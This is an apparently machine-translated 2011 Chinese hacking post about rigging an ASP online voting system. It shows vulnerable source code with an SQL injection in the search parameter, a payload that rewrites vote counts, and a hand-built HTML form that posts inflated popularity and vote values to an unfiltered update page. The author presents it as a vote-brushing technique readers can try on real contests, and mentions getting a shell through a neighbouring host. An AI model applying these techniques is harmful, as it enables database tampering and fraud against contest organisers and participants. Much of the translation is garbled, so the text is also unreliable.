A voting system bug, cause you can brush votes brush downloads-vulnerability warning-the black bar safety net

2011-12-17T00:00:00
ID MYHACK58:62201132612
Type myhack58
Reporter 佚名
Modified 2011-12-17T00:00:00

Description

This article does not for a particular activity or site, the ASP voting system relates to many website activities. Its core code is the same, just styled somewhat questioningly. Don't want everyone to bulk engage in Station, but occasionally hit peripheral participation activities can use this BUG to try it.

Students participate in a large draft(CCTV to participate in the activities, The every day Q the line just to see her hair to make it get the vote. A little bit of the cast is not too terribly.

Subsequently observation this station, asp voting system, the station outside the get, ip, and time to do. Finally, the direct c-segment to get to the shell, but this is not a long-term(voting system you can't directly add a lot of votes, the management will find. shell estimates can not be maintained long-term)

Down the program to see, Upload a lot of points, take the shell can not be achieved, just look at the injection or something.

In the view of the front Desk name number search find a can containing of injection.

t=Request("t")

key=Request("key")

Select case t

case "id":sql="Select * from xxx where sh=1 and id like '"&key&"' order by ps desc":msg="in accordance with the number:"&key&"sort"

case "name":sql="Select * from xxx where sh=1 and name like '"&key&"' order by ps desc":msg="in the name:"&key&"sort"

case else you can see directly will lead to the injection

"' and........ update xxxx set ps=8 8 8 8 where id=8 8 8 ""and the like, the end of the previous note behind the statement.

Then look at the player to modify the page after the Submit update procedure:

If Trim(Request. Form("ValidCode"))=Empty Or Trim(Session("cnbruce. com_ValidateCode"))<>Trim(Request. Form("ValidCode")) Then

Response. write("<script language='javascript'>alert('CAPTCHA error!'); history. back();</script>")

Response. end()

End if

sql="Select * from xxx where id="&Session("id")

Set rs=Server. CreateObject("ADODB. Recordset")

rs. Open sql,conn,1,3

putallrs(rs) //I'm also very surprised this issue you can look at my prior theme, and a points rebate system similar to

rs("video")=Request. Form("video")

rs. Update

rs. Close see above this code is very exciting. Membership information, including popularity values and the votes are all in the same table. And above this cease code not filtered.

Again the localized form, the voting page vote_do. asp do to prevent outside submission, but the player to modify the page here does not. The page right button to view the source code, remove the mess, two lines of input, the popularity and number of votes

Submitted to the success! To cut this figure, specifically on the next the QQ, the coating does not look good of course without dew point)

<form action="http://www.badguest.cn /View_do. asp" method="post" name="beauty_in" id="beauty_in" onsubmit="return(monitor());" >

<input name="ps" value="8 8 8 8 8 8"/><input name="rq" value="8 8 8 8 8 8 8"/>

<td height="2 5" align="left" valign="middle"><span class="na">*</span>verification code:

<input name="ValidCode" />

<img id="chk" onclick="document. all. chk. src=";document. all. chk. src='http://www.2cto.com /Inc/ChkCode/validatecode. asp';" src="http://www.xxxxx.com/Inc/ChkCode/validatecode.asp" border="0" /><img src="Images/defaulting.gif" width="9 0" height="1 2 0" style=" display:none" /> <span style="cursor:hand; color:#0000CC;" onclick="document. all. chk. src=";document. all. chk. src='http://www.xxxxx.com/Inc/ChkCode/validatecode.asp';">can't see it?& lt;/span></td>

</tr>

<tr>

<td align="center"><input type="submit" value="submit" name="Submitok" />

<input type="reset" value="empty-refill" name="reset" /></td>

</tr>

</tbody>

</table>

</form>direct plus ticket up. Don't know brush ticket&......% The company is not such a plus(required for player login) for?

[1] [2] next